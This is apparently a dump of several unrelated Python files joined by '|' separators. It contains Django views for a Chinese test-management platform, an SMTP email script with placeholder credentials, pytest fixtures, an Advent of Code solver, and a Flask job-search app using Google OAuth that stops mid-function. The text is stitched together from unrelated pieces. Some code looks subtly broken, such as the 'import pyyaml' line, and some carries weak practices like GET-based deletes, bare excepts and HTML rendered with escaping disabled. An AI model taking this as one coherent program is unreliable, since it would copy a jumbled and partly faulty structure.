# 单接口管理
def apis_manage(request):
apis_list = Apis.objects.all()
paginator = Paginator(apis_list, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': '接口用例管理',
'apis_list': page_object,
}
return render(request, 'apis_manage.html', context=data)
# 添加单接口
def add_apis(request):
if request.method == 'GET':
pro_names = Product.objects.all()
data = {
'title': '添加接口用例',
'pro_names': pro_names,
}
return render(request, 'add_apis.html', context=data)
elif request.method == 'POST':
api_product = request.POST.get('dropdown')
api_name = request.POST.get('api_name')
api_url = request.POST.get('api_url')
api_param_value = request.POST.get('api_param_value')
api_method = request.POST.get('method_check')
api_result = request.POST.get('api_result')
api_status = request.POST.get('api_status')
apis = Apis.objects.filter(api_name=api_name)
if api_name == "" or apis.exists():
return redirect(reverse('at:add_apis'))
else:
api = Apis()
api.api_name = api_name
api.api_url = api_url
api.api_param_value = api_param_value
api.api_method = api_method
api.api_result = api_result
api.api_status = api_status
api.api_pro_id = api_product
api.save()
return redirect(reverse('at:apis_manage'))
return redirect(reverse('at:add_apis'))
# 编辑接口
def apis_update(request):
apis_id = request.GET.get("apis.id")
pro_names = Product.objects.all()
apis = Apis.objects.filter(id=apis_id).first()
data = {
'title': '编辑接口用例',
'apis': apis,
'pro_names': pro_names,
}
if request.method == "POST":
api_product = request.POST.get('dropdown')
api_name = request.POST.get('api_name')
api_url = request.POST.get('api_url')
api_param_value = request.POST.get('api_param_value')
api_method = request.POST.get('method_check')
api_result = request.POST.get('api_result')
api_status = request.POST.get('api_status')
if api_name == "":
return redirect(reverse('at:apis_update'))
Apis.objects.filter(id=apis_id).update(
api_name=api_name,
api_url=api_url,
api_param_value=api_param_value,
api_method=api_method,
api_result=api_result,
api_status=api_status,
api_pro_id=api_product
)
return redirect(reverse("at:apis_manage"))
return render(request, 'apis_update.html', context=data)
# 删除接口
def apis_delete(request):
apis_id = request.GET['apis_id']
try:
apis = Apis.objects.get(id=apis_id)
apis.delete()
return HttpResponse('1')
except:
return HttpResponse('2')
# 流程接口管理
def api_test_manage(request):
api_test = Apitest.objects.all()
paginator = Paginator(api_test, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': '流程用例管理',
'api_test': page_object,
}
return render(request, 'api_test_manage.html', context=data)
# 添加流程接口
def add_api_test(request):
if request.method == "GET":
pro_names = Product.objects.all()
data = {
'title': '添加接口用例',
'pro_names': pro_names,
}
return render(request, 'add_api_test.html', context=data)
elif request.method == "POST":
api_product = request.POST.get('dropdown')
api_t_name = request.POST.get('api_t_name')
api_t_desc = request.POST.get('api_t_desc')
api_ter = request.POST.get('api_ter')
api_status = request.POST.get('api_status')
api_tests = Apitest.objects.filter(api_t_name=api_t_name)
if api_t_name == "" or api_tests.exists():
return redirect(reverse('at:add_api_test'))
else:
api_test = Apitest()
api_test.api_t_name = api_t_name
api_test.api_t_desc = api_t_desc
api_test.api_ter = api_ter
api_test.api_t_res = api_status
api_test.api_t_pro_id = api_product
api_test.save()
return redirect(reverse('at:api_test_manage'))
return redirect(reverse('at:add_api_test'))
# 删除接口
def api_delete(request):
api_id = request.GET['api_id']
try:
api = Apitest.objects.get(id=api_id)
api.delete()
return HttpResponse('1')
except:
return HttpResponse('2')
# 编辑接口
def api_update(request):
api_id = request.GET.get("api_t.id")
pro_names = Product.objects.all()
api_t = Apitest.objects.filter(id=api_id).first()
data = {
'title': '编辑接口用例',
'api_t': api_t,
'pro_names': pro_names,
}
if request.method == "POST":
api_product = request.POST.get('dropdown')
api_t_name = request.POST.get('api_t_name')
api_t_desc = request.POST.get('api_t_desc')
api_ter = request.POST.get('api_ter')
api_status = request.POST.get('api_status')
if api_t_name == "":
return redirect(reverse('at:api_update'))
Apitest.objects.filter(id=api_id).update(
api_t_name=api_t_name,
api_t_desc=api_t_desc,
api_ter=api_ter,
api_t_res=api_status,
api_t_pro_id=api_product,
)
return redirect(reverse("at:api_test_manage"))
return render(request, 'api_update.html', context=data)
# 流程接口步骤管理
def api_step_manage(request):
api_test_id = request.GET.get('api_t.id')
api_test = Apitest.objects.get(id=api_test_id)
api_steps = Apistep.objects.all()
data = {
'title': '接口用例步骤管理',
'api_steps': api_steps,
'api_test': api_test,
}
return render(request, 'api_step_manage.html', context=data)
# 添加流程接口步骤
def add_api_step(request):
if request.method == "GET":
api_tests = Apitest.objects.all()
data = {
'title': '添加接口用例步骤',
'api_tests': api_tests,
}
return render(request, 'add_api_step.html', context=data)
elif request.method == "POST":
api_t_id = request.POST.get('dropdown')
api_step = request.POST.get('api_step')
api_name = request.POST.get('api_name')
api_url = request.POST.get('api_url')
api_param_value = request.POST.get('api_param_value')
api_method = request.POST.get('method_check')
api_result = request.POST.get('api_result')
api_status = request.POST.get('api_status')
if api_name == "":
return redirect(reverse('at:add_api_step'))
else:
api_steps = Apistep()
api_steps.api_name = api_name
api_steps.api_step = api_step
api_steps.api_url = api_url
api_steps.api_param_value = api_param_value
api_steps.api_method = api_method
api_steps.api_result = api_result
api_steps.api_status = api_status
api_steps.api_test_id = api_t_id
api_steps.save()
return redirect(reverse('at:api_test_manage'))
return redirect(reverse('at:add_api_step'))
# 删除接口步骤
def api_step_delete(request):
api_step_id = request.GET['api_step_id']
try:
api_step = Apistep.objects.get(id=api_step_id)
api_step.delete()
return HttpResponse('1')
except:
return HttpResponse('2')
# 编辑接口步骤
def api_step_update(request):
api_step_id = request.GET.get("api_step.id")
api_tests = Apitest.objects.all()
api_step = Apistep.objects.filter(id=api_step_id).first()
data = {
'title': '编辑接口用例',
'api_step': api_step,
'api_tests': api_tests,
}
if request.method == "POST":
api_t_id = request.POST.get('dropdown')
api_step = request.POST.get('api_step')
api_name = request.POST.get('api_name')
api_url = request.POST.get('api_url')
api_param_value = request.POST.get('api_param_value')
api_method = request.POST.get('method_check')
api_result = request.POST.get('api_result')
api_status = request.POST.get('api_status')
if api_name == "":
return redirect(reverse('at:api_step_update'))
Apistep.objects.filter(id=api_step_id).update(
api_name=api_name,
api_step=api_step,
api_url=api_url,
api_param_value=api_param_value,
api_method=api_method,
api_result=api_result,
api_status=api_status,
api_test_id=api_t_id
)
return redirect(reverse("at:api_test_manage"))
return render(request, 'api_step_update.html', context=data)
# bug管理
def bug_manage(request):
bugs = Bug.objects.all()
paginator = Paginator(bugs, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': 'Bug列表',
'bugs': page_object,
}
return render(request, 'bug_manage.html', context=data)
# 添加bug
def add_bug(request):
if request.method == "GET":
pro_names = Product.objects.all()
data = {
'title': '添加Bug',
'pro_names': pro_names,
}
return render(request, 'add_bug.html', context=data)
elif request.method == "POST":
bug_product = request.POST.get('dropdown')
bug_name = request.POST.get('bug_name')
bug_detail = request.POST.get('bug_detail')
bug_level = request.POST.get('bug_level')
bug_status = request.POST.get('bug_status')
bug_creat_er = request.POST.get('bug_creat_er')
bug_assign = request.POST.get('bug_assign')
if bug_name == "":
return redirect(reverse('at:add_bug'))
else:
bugs = Bug()
bugs.bug_name = bug_name
bugs.bug_detail = bug_detail
bugs.bug_level = bug_level
bugs.bug_status = bug_status
bugs.bug_creat_er = bug_creat_er
bugs.bug_assign = bug_assign
bugs.bug_pro_id = bug_product
bugs.save()
return redirect(reverse('at:bug_manage'))
return redirect(reverse('at:add_bug'))
# 删除bug
def bug_delete(request):
bug_id = request.GET['bug_id']
try:
bug = Bug.objects.get(id=bug_id)
bug.delete()
return HttpResponse("1")
except:
return HttpResponse("2")
# 编辑bug
def bug_update(request):
bug_id = request.GET.get("bug.id")
pro_names = Product.objects.all()
bug = Bug.objects.filter(id=bug_id).first()
data = {
'title': '编辑Bug',
'bug': bug,
'pro_names': pro_names,
}
if request.method == "POST":
bug_product = request.POST.get('dropdown')
bug_name = request.POST.get('bug_name')
bug_detail = request.POST.get('bug_detail')
bug_level = request.POST.get('bug_level')
bug_status = request.POST.get('bug_status')
bug_creat_er = request.POST.get('bug_creat_er')
bug_assign = request.POST.get('bug_assign')
if bug_name == "":
return redirect(reverse('at:add_bug'))
Bug.objects.filter(id=bug_id).update(
bug_name=bug_name,
bug_detail=bug_detail,
bug_level=bug_level,
bug_status=bug_status,
bug_creat_er=bug_creat_er,
bug_assign=bug_assign,
bug_pro_id=bug_product,
)
return redirect(reverse("at:bug_manage"))
return render(request, 'bug_update.html', context=data)
# 设置管理
def set_manage(request):
sets = Set.objects.all()
paginator = Paginator(sets, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': '公共设置',
'sets': page_object,
}
return render(request, 'set_manage.html', context=data)
# 用户设置管理
def set_user_manage(request):
at_user = ATUser.objects.all()
paginator = Paginator(at_user, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': '用户管理',
'at_user': page_object,
}
return render(request, 'set_user_manage.html', context=data)
# 添加管理
def add_set(request):
if request.method == 'GET':
data = {
'title': '添加设置'
}
return render(request, 'add_set.html', context=data)
elif request.method == 'POST':
set_name = request.POST.get('set_name')
set_value = request.POST.get('set_value')
sets = Set.objects.filter(set_name=set_name)
if set_name == "" or sets.exists():
return redirect(reverse('at:add_set'))
else:
set_ = Set()
set_.set_name = set_name
set_.set_value = set_value
set_.save()
return redirect(reverse('at:set_manage'))
return redirect(reverse('at:add_set'))
# App用例管理
def app_test_manage(request):
app_tests = Apptest.objects.all()
paginator = Paginator(app_tests, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': 'App用例管理',
'app_tests': page_object,
}
return render(request, 'app_test_manage.html', context=data)
# 添加App用例
def add_app_test(request):
if request.method == "GET":
pro_names = Product.objects.all()
data = {
'title': '添加App用例',
'pro_names': pro_names
}
return render(request, 'add_app_test.html', context=data)
elif request.method == "POST":
app_product = request.POST.get('dropdown')
app_t_name = request.POST.get('app_t_name')
app_t_desc = request.POST.get('app_t_desc')
app_ter = request.POST.get('app_ter')
app_t_res = request.POST.get('app_t_res')
app_tests = Apptest.objects.filter(app_t_name=app_t_name)
if app_t_name == "" or app_tests.exists():
return redirect(reverse('at:add_app_test'))
else:
app_test = Apptest()
app_test.app_t_name = app_t_name
app_test.app_t_desc = app_t_desc
app_test.app_ter = app_ter
app_test.app_t_res = app_t_res
app_test.app_t_pro_id = app_product
app_test.save()
return redirect(reverse('at:app_test_manage'))
return redirect(reverse('at:add_app_test'))
# 删除app用例
def app_delete(request):
app_id = request.GET['app_id']
try:
app = Apptest.objects.get(id=app_id)
app.delete()
return HttpResponse("1")
except:
return HttpResponse("2")
# 编辑app用例
def app_update(request):
app_id = request.GET.get("app_t.id")
pro_names = Product.objects.all()
app_t = Apptest.objects.filter(id=app_id).first()
data = {
'title': '编辑App用例',
'app_t': app_t,
'pro_names': pro_names,
}
if request.method == "POST":
app_product = request.POST.get('dropdown')
app_t_name = request.POST.get('app_t_name')
app_t_desc = request.POST.get('app_t_desc')
app_ter = request.POST.get('app_ter')
app_t_res = request.POST.get('app_t_res')
if app_t_name == "":
return redirect(reverse('at:app_update'))
Apptest.objects.filter(id=app_id).update(
app_t_name=app_t_name,
app_t_desc=app_t_desc,
app_ter=app_ter,
app_t_res=app_t_res,
app_t_pro_id=app_product
)
return redirect(reverse("at:app_test_manage"))
return render(request, 'app_update.html', context=data)
# App用例步骤管理
def app_step_manage(request):
app_t_id = request.GET.get('app_t.id')
app_test = Apptest.objects.get(id=app_t_id)
app_steps = Appteststep.objects.all()
data = {
'title': 'App用例步骤管理',
'app_test': app_test,
'app_steps': app_steps,
}
return render(request, 'app_step_manage.html', context=data)
# 添加App用例步骤
def add_app_step(request):
if request.method == "GET":
app_test = Apptest.objects.all()
data = {
'title': '添加App用例步骤',
'app_test': app_test,
}
return render(request, 'add_app_step.html', context=data)
elif request.method == "POST":
app_t_id = request.POST.get('dropdown')
app_step = request.POST.get('app_step')
app_find_method = request.POST.get('app_find_method')
app_element = request.POST.get('app_element')
app_opt_method = request.POST.get('app_opt_method')
app_test_data = request.POST.get('app_test_data')
app_assert_data = request.POST.get('app_assert_data')
app_result = request.POST.get('app_result')
if app_step == "":
return redirect(reverse('at:add_app_step'))
else:
app_steps = Appteststep()
app_steps.app_step = app_step
app_steps.app_find_method = app_find_method
app_steps.app_element = app_element
app_steps.app_opt_method = app_opt_method
app_steps.app_test_data = app_test_data
app_steps.app_assert_data = app_assert_data
app_steps.app_result = app_result
app_steps.app_test_id = app_t_id
app_steps.save()
return redirect(reverse('at:app_test_manage'))
return redirect(reverse('at:add_app_step'))
# 删除App用例步骤
def app_step_delete(request):
app_step_id = request.GET['app_step_id']
try:
app_step = Appteststep.objects.get(id=app_step_id)
app_step.delete()
return HttpResponse("1")
except:
return HttpResponse("2")
# 编辑App用例步骤
def app_step_update(request):
app_step_id = request.GET.get("app_step.id")
app_test = Apptest.objects.all()
app_step = Appteststep.objects.filter(id=app_step_id).first()
data = {
'title': '编辑App用例步骤',
'app_step': app_step,
'app_test': app_test,
}
if request.method == "POST":
app_t_id = request.POST.get('dropdown')
app_step = request.POST.get('app_step')
app_find_method = request.POST.get('app_find_method')
app_element = request.POST.get('app_element')
app_opt_method = request.POST.get('app_opt_method')
app_test_data = request.POST.get('app_test_data')
app_assert_data = request.POST.get('app_assert_data')
app_result = request.POST.get('app_result')
if app_step == "":
return redirect(reverse('at:app_step_update'))
Appteststep.objects.filter(id=app_step_id).update(
app_step=app_step,
app_find_method=app_find_method,
app_element=app_element,
app_opt_method=app_opt_method,
app_test_data=app_test_data,
app_assert_data=app_assert_data,
app_result=app_result,
app_test_id=app_t_id
)
return redirect(reverse("at:app_test_manage"))
return render(request, 'app_step_update.html', context=data)
# Web用例管理
def web_test_manage(request):
web_tests = Webtest.objects.all()
paginator = Paginator(web_tests, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': 'Web用例管理',
'web_tests': page_object,
}
return render(request, 'web_test_manage.html', context=data)
# 添加Web用例
def add_web_test(request):
if request.method == "GET":
pro_names = Product.objects.all()
data = {
'title': '添加Web用例',
'pro_names': pro_names
}
return render(request, 'add_web_test.html', context=data)
elif request.method == "POST":
web_product = request.POST.get('dropdown')
web_t_name = request.POST.get('web_t_name')
web_t_desc = request.POST.get('web_t_desc')
web_ter = request.POST.get('web_ter')
web_t_res = request.POST.get('web_t_res')
web_tests = Webtest.objects.filter(web_t_name=web_t_name)
if web_t_name == "" or web_tests.exists():
return redirect(reverse('at:add_web_test'))
else:
web_test = Webtest()
web_test.web_t_name = web_t_name
web_test.web_t_desc = web_t_desc
web_test.web_ter = web_ter
web_test.web_t_res = web_t_res
web_test.web_t_pro_id = web_product
web_test.save()
return redirect(reverse('at:web_test_manage'))
return redirect(reverse('at:add_web_test'))
# 删除web用例
def web_delete(request):
web_id = request.GET['web_id']
try:
web = Webtest.objects.get(id=web_id)
web.delete()
return HttpResponse("1")
except:
return HttpResponse("2")
# 编辑web用例
def web_update(request):
web_id = request.GET.get("web_t.id")
pro_names = Product.objects.all()
web_t = Webtest.objects.filter(id=web_id).first()
data = {
'title': '编辑Web用例',
'web_t': web_t,
'pro_names': pro_names,
}
if request.method == "POST":
web_product = request.POST.get('dropdown')
web_t_name = request.POST.get('web_t_name')
web_t_desc = request.POST.get('web_t_desc')
web_ter = request.POST.get('web_ter')
web_t_res = request.POST.get('web_t_res')
if web_t_name == "":
return redirect(reverse('at:web_update'))
Webtest.objects.filter(id=web_id).update(
web_t_name=web_t_name,
web_t_desc=web_t_desc,
web_ter=web_ter,
web_t_res=web_t_res,
web_t_pro_id=web_product
)
return redirect(reverse("at:web_test_manage"))
return render(request, 'web_update.html', context=data)
# Web用例步骤管理
def web_step_manage(request):
web_t_id = request.GET.get('web_t.id')
web_t = Webtest.objects.get(id=web_t_id)
web_steps = Webteststep.objects.all()
data = {
'title': 'Web用例步骤管理',
'web_t': web_t,
'web_steps': web_steps,
}
return render(request, 'web_step_manage.html', context=data)
# 添加Web用例步骤
def add_web_step(request):
if request.method == "GET":
web_test = Webtest.objects.all()
data = {
'title': '添加Web用例步骤',
'web_test': web_test,
}
return render(request, 'add_web_step.html', context=data)
elif request.method == "POST":
web_t_id = request.POST.get('dropdown')
web_step = request.POST.get('web_step')
web_find_method = request.POST.get('web_find_method')
web_element = request.POST.get('web_element')
web_opt_method = request.POST.get('web_opt_method')
web_test_data = request.POST.get('web_test_data')
web_assert_data = request.POST.get('web_assert_data')
web_result = request.POST.get('web_result')
if web_step == "":
return redirect(reverse('at:add_web_step'))
else:
web_steps = Webteststep()
web_steps.web_step = web_step
web_steps.web_find_method = web_find_method
web_steps.web_element = web_element
web_steps.web_opt_method = web_opt_method
web_steps.web_test_data = web_test_data
web_steps.web_assert_data = web_assert_data
web_steps.web_result = web_result
web_steps.web_test_id = web_t_id
web_steps.save()
return redirect(reverse('at:web_test_manage'))
return redirect(reverse('at:add_web_step'))
# web用例步骤删除
def web_step_delete(request):
web_step_id = request.GET['web_step_id']
try:
web_step = Webteststep.objects.get(id=web_step_id)
web_step.delete()
return HttpResponse("1")
except:
return HttpResponse("2")
# web用例步骤编辑
def web_step_update(request):
web_step_id = request.GET.get("web_step.id")
web_test = Webtest.objects.all()
web_step = Webteststep.objects.filter(id=web_step_id).first()
data = {
'title': '编辑Web用例步骤',
'web_step': web_step,
'web_test': web_test,
}
if request.method == "POST":
web_t_id = request.POST.get('dropdown')
web_step = request.POST.get('web_step')
web_find_method = request.POST.get('web_find_method')
web_element = request.POST.get('web_element')
web_opt_method = request.POST.get('web_opt_method')
web_test_data = request.POST.get('web_test_data')
web_assert_data = request.POST.get('web_assert_data')
web_result = request.POST.get('web_result')
if web_step == "":
return redirect(reverse('at:web_step_update'))
Webteststep.objects.filter(id=web_step_id).update(
web_step=web_step,
web_find_method=web_find_method,
web_element=web_element,
web_opt_method=web_opt_method,
web_test_data=web_test_data,
web_assert_data=web_assert_data,
web_result=web_result,
web_test_id=web_t_id
)
return redirect(reverse("at:web_test_manage"))
return render(request, 'web_step_update.html', context=data)
# 接口报告
def apis_report(request):
# 打开文件
path = "E:/auto_test/apis_auto_test_case/report/"
dirs = os.listdir(path)
apis_list = []
# 输出所有文件
for file in dirs:
apis_list.append(file)
paginator = Paginator(apis_list, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': '单一接口报告',
'apis_list': page_object,
}
return render(request, 'apis_report.html', context=data)
def api_test_report(request):
path = "E:/auto_test/api_test_auto_test_case/report/"
dirs = os.listdir(path)
api_test_list = []
for file in dirs:
api_test_list.append(file)
paginator = Paginator(api_test_list, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': '流程接口报告',
'api_test_list': page_object,
}
return render(request, 'api_test_report.html', context=data)
def web_report(request):
path = "E:/auto_test/web_auto_test_case/report/"
dirs = os.listdir(path)
web_list = []
for file in dirs:
web_list.append(file)
paginator = Paginator(web_list, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': 'Web测试报告',
'web_list': page_object,
}
return render(request, 'web_report.html', context=data)
def app_report(request):
path = "E:/auto_test/app_auto_test_case/report/"
dirs = os.listdir(path)
app_list = []
for file in dirs:
app_list.append(file)
paginator = Paginator(app_list, 10)
page = request.GET.get('page', 1)
page_object = paginator.page(page)
data = {
'title': 'App测试报告',
'app_list': page_object,
}
return render(request, 'app_report.html', context=data)
# 定时任务列表
def celery_manage(request):
task_list = PeriodicTask.objects.all()
# 周期任务(如一小时执行一次)
periodic_list = IntervalSchedule.objects.all()
# 定时任务(如某年某月某日,每天的某时)
cron_list = CrontabSchedule.objects.all()
data = {
'title': '定时任务',
'task_list': task_list,
'periodic_list': periodic_list,
'cron_list': cron_list,
}
return render(request, 'celery_manage.html', context=data)
# 删除celery
def celery_delete(request):
task_id = request.GET['task_id']
try:
task = PeriodicTask.objects.get(id=task_id)
task.delete()
return HttpResponse('1')
except:
return HttpResponse('2')
# 启动celery条件
def celery_page(request):
data = {
'title': '启动celery条件'
}
return render(request, 'celery_page.html', context=data)
# 产品搜索
def pro_search(request):
search_name = request.GET.get('p_product_name', '')
# icontains忽略大小写
pro_list = Product.objects.filter(p_product_name__icontains=search_name)
# 分页
paginator = Paginator(pro_list, 10)
page = request.GET.get('page', 1)
pro_lists = paginator.page(page)
data = {
'title': '产品中心',
'products': pro_lists,
'search_name': search_name,
}
return render(request, 'product_manage.html', context=data)
# 用例搜索
def apis_search(request):
search_name = request.GET.get('api_name')
api_list = Apis.objects.filter(api_name__icontains=search_name)
# 分页
paginator = Paginator(api_list, 10)
page = request.GET.get('page', 1)
api_lists = paginator.page(page)
data = {
'title': '接口用例管理',
'search_name': search_name,
'apis_list': api_lists,
}
return render(request, 'apis_manage.html', context=data)
# 流程用例搜索
def api_test_search(request):
search_name = request.GET.get('api_t_name')
api_t_list = Apitest.objects.filter(api_t_name__contains=search_name)
# 分页
paginator = Paginator(api_t_list, 10)
page = request.GET.get('page', 1)
api_t_lists = paginator.page(page)
data = {
'title': '流程用例管理',
'search_name': search_name,
'api_test': api_t_lists,
}
return render(request, 'api_test_manage.html', context=data)
# Web用例搜索
def web_search(request):
search_name = request.GET.get('web_t_name')
web_t_list = Webtest.objects.filter(web_t_name__contains=search_name)
# 分页
paginator = Paginator(web_t_list, 10)
page = request.GET.get('page', 1)
web_lists = paginator.page(page)
data = {
'title': 'Web用例管理',
'web_tests': web_lists,
'search_name': search_name,
}
return render(request, 'web_test_manage.html', context=data)
def app_search(request):
search_name = request.GET.get('app_t_name')
app_t_list = Apptest.objects.filter(app_t_name__contains=search_name)
# 分页
paginator = Paginator(app_t_list, 10)
page = request.GET.get('page', 1)
app_lists = paginator.page(page)
data = {
'title': 'App用例管理',
'app_tests': app_lists,
'search_name': search_name,
}
return render(request, 'app_test_manage.html', context=data)
def bug_search(request):
search_name = request.GET.get('bug_name')
bug_list = Bug.objects.filter(bug_name__contains=search_name)
# 分页
paginator = Paginator(bug_list, 10)
page = request.GET.get('page', 1)
bug_lists = paginator.page(page)
data = {
'title': 'App用例管理',
'search_name': search_name,
'bugs': bug_lists,
}
return render(request, 'bug_manage.html', context=data)
# 持续集成页面
def jenkins_page(request):
data = {
'title': 'jenkins页面'
}
return render(request, 'jenkins_page.html', context=data)
# 性能测试页面
def locust_page(request):
data = {
'title': 'locust页面'
}
return render(request, 'locust_page.html', context=data)
# Celery测试
def do(request):
# 执行异步任务
print('start do...')
ApiTask.delay()
print('end do...')
return JsonResponse({'result': 'ok'})
|
from more_itertools import ilen
from my.location.ip import ips
def test_ips() -> None:
assert ilen(ips()) > 10
|
import json
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
# mensagem
msg = MIMEMultipart()
message = "Email recebido!"
# Cred. e assuntos #
password = "*** Senha do seu e-mail ***"
msg['From'] = "*** login do e-mail que vai enviar ***"
msg['To'] = "*** login do e-mail que vai receber ***"
msg['Subject'] = "Enviando gmail " # Assunto
# conexão e envia o email #
msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP('smtp.gmail.com', port=587)
server.starttls()
server.login(msg['From'], password)
server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit() |
from pytest import fixture
from starlette.config import environ
from starlette.testclient import TestClient
from app.db.mongodb import get_database
from app.core.config import database_name, users_collection_name
import pyyaml
@fixture(scope="session")
def test_user():
return {
"user": {
"email": "user1@example.com",
"password": "string1",
"username": "string1"
}
}
@fixture(scope="session")
def test_client(test_user):
from app.main import app
with TestClient(app) as test_client:
yield test_client
import asyncio
db = asyncio.run(get_database())
db[database_name][users_collection_name].delete_one({"username": test_user["user"]["username"]})
# This line would raise an error if we use it after 'settings' has been imported.
environ['TESTING'] = 'TRUE'
|
class Probe:
def __init__(self, vx, vy, x, y):
self.vx = vx
self.vy = vy
self.x = x
self.y = y
def update(self):
self.x += self.vx
self.y += self.vy
if self.vx != 0:
self.vx -= self.vx // abs(self.vx)
self.vy -= 1
def contained(self, x1, x2, y1, y2):
return self.x >= x1 and self.x <= x2 and self.y >= y1 and self.y <= y2
def reachable(self, x1, x2, y1, y2):
return self.x <= x2 and ((self.y <= y2 and self.vy > -1) or self.y >= y1)
target = (175,227, -134,-79)
o = []
def test(vx, vy, part2):
p = Probe(vx, vy, 0, 0)
ys = []
while p.reachable(*target):
p.update()
ys.append(p.y)
if p.contained(*target):
o.append([vx, vy])
return 1 if part2 else max(ys)
return 0
print("Part 1", max(test(i, j, False) for i in range(0, 304) for j in range(-200, 200)))
print("Part 2", sum(test(i, j, True) for i in range(0, 304) for j in range(-200, 200)))
xs, ys = zip(*o)
print(min(xs), max(xs))
print(min(ys), max(ys)) |
#!/usr/bin/env python
from flask import Flask, render_template, url_for, request, redirect, session
from flask_session import Session
import datetime
from dateutil.parser import parse as parse_date
from utils import create_connection
import pandas as pd
import logging
import sys
import os
import re
import sqlite3
import json
from flask_login import (
LoginManager,
current_user,
login_required,
login_user,
logout_user,
)
from oauthlib.oauth2 import WebApplicationClient
import requests
from user import User
from functools import lru_cache
logger = logging.getLogger(__name__)
log_handler = logging.StreamHandler(sys.stdout)
log_handler.setFormatter(
logging.Formatter(
"%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(funcName)s "
"- line %(lineno)d"
)
)
logger.addHandler(log_handler)
logger.setLevel(logging.INFO)
app = Flask(__name__)
#set up Flask-Sessions
app.config.from_object(__name__)
app.config['SESSION_TYPE'] = 'filesystem'
try:
with open(".secret.json") as f:
app.config['SECRET_KEY'] = json.load(f)["flask_session_key"]
except FileNotFoundError: # no `.secret.json` file if running in CI
app.config['SECRET_KEY'] = "JUSTTESTING"
Session(app)
# trick from SO for properly relaoding CSS
app.config['TEMPLATES_AUTO_RELOAD'] = True
set_default_user_id = False
try:
with open(".secret.json") as f:
cred = json.load(f)["oauth_cred"]
GOOGLE_CLIENT_ID = cred.get("GOOGLE_CLIENT_ID", None)
GOOGLE_CLIENT_SECRET = cred.get("GOOGLE_CLIENT_SECRET", None)
client = WebApplicationClient(GOOGLE_CLIENT_ID) # OAuth 2 client setup
except FileNotFoundError: # CI server
set_default_user_id = True # to enable tests on CI server
GOOGLE_DISCOVERY_URL = (
"https://accounts.google.com/.well-known/openid-configuration"
)
# User session management setup
# https://flask-login.readthedocs.io/en/latest
login_manager = LoginManager()
login_manager.init_app(app)
# Flask-Login helper to retrieve a user from our db
@login_manager.user_loader
def load_user(user_id):
return User.get(user_id)
def get_google_provider_cfg():
return requests.get(GOOGLE_DISCOVERY_URL).json()
# this function works in conjunction with `dated_url_for` to make sure the browser uses
# the latest version of css stylesheet when modified and reloaded during testing
@app.context_processor
def override_url_for():
return dict(url_for=dated_url_for)
def dated_url_for(endpoint, **values):
if endpoint == "static":
filename = values.get("filename", None)
if filename:
file_path = os.path.join(app.root_path, endpoint, filename)
values["q"] = int(os.stat(file_path).st_mtime)
return url_for(endpoint, **values)
def load_user():
if session.get('user_id'):
return
username = current_user.name if current_user.is_authenticated else None
if current_user.is_authenticated:
session['user_id'] = current_user.id
session['user_name'] = current_user.name
session['user_email'] = current_user.email
if session.get('user_id'):
with create_connection() as conn:
session['account_type'] = pd.read_sql("""
SELECT *
FROM users
WHERE id=?
""", conn, params=[current_user.id]).iloc[0].account_type
if session.get('account_type') != "full":
return redirect(url_for("index"))
elif set_default_user_id: # for CI server
session['user_id'] = 1
session['user_name'] = "Testing123"
session['user_type'] = "full"
else: # for for dev and prod servers
session['user_id'] = None
def load_search_table(user_id):
fetch_searches_query = """
SELECT * FROM search
WHERE user_id = ?
"""
with create_connection() as conn:
search_table = pd.read_sql(fetch_searches_query, conn, params=[user_id])
return search_table
# function could be improved to find whichever candidate shows up most frequently within visible
# text of base_url page. Make sure to use aiohttp to avoid blocking the event loop if this is
# implemented!
def get_company_name(base_url):
words = (re.findall('[^#$%&/.:]{3,}', base_url))
discard_words = ('career', 'careers', 'job', 'jobs', 'lever', 'www', 'http', 'https', 'gov', 'com')
candidates = [word for word in words if word not in discard_words]
company_name = candidates[0].title()
return company_name
@app.route("/", methods=["POST", "GET"])
def index():
load_user()
search_table = load_search_table(session['user_id'])
if len(search_table):
search_table["action"] = search_table.apply(
lambda row: (
f"{url_for('delete_search', id=row.id)}"
),
axis=1,
)
search_table_html = (search_table
.style.set_table_styles(
[
{
"selector": "th",
"props": [
("background-color", "rgb(122, 128, 138)"),
("color", "black"),
],
}
]
)
.set_table_attributes('border="1"')
.set_properties(
**{"font-size": "10pt", "background-color": "rgb(168, 185, 191)"}
)
.set_properties(
subset=["action"], **{"text-align": "center"}
)
.hide_index()
)
search_table_html = search_table_html.render(escape=False)
else:
search_table_html = None
return render_template('landing_page.html', search_table=search_table, search_table_html=search_table_html)
@app.route("/login")
def login():
# Find out what URL to hit for Google login
google_provider_cfg = get_google_provider_cfg()
authorization_endpoint = google_provider_cfg["authorization_endpoint"]
# Use library to construct the request for Google login and provide
# scopes that let you retrieve user's profile from Google
request_uri = client.prepare_request_uri(
authorization_endpoint,
redirect_uri=request.base_url + "/callback",
scope=["openid", "email", "profile"],
)
return redirect(request_uri)
@app.route("/login/callback")
def callback():
# Get authorization code Google sent back to you
code = request.args.get("code")
# Find out what URL to hit to get tokens that allow you to ask for
# things on behalf of a user
google_provider_cfg = get_google_provider_cfg()
token_endpoint = google_provider_cfg["token_endpoint"]
# Prepare and send request to get tokens! Yay tokens!
token_url, headers, body = client.prepare_token_request(
token_endpoint,
authorization_response=request.url,
redirect_url=request.base_url,
code=code,
)
token_response = requests.post(
token_url,
headers=headers,
data=body,
auth=(GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET),
)
# Parse the tokens!
client.parse_request_body_response(json.dumps(token_response.json()))
# Now that we have tokens (yay) let's find and hit URL
# from Google that gives you user's profile information,
# including their Google Profile Image and Email
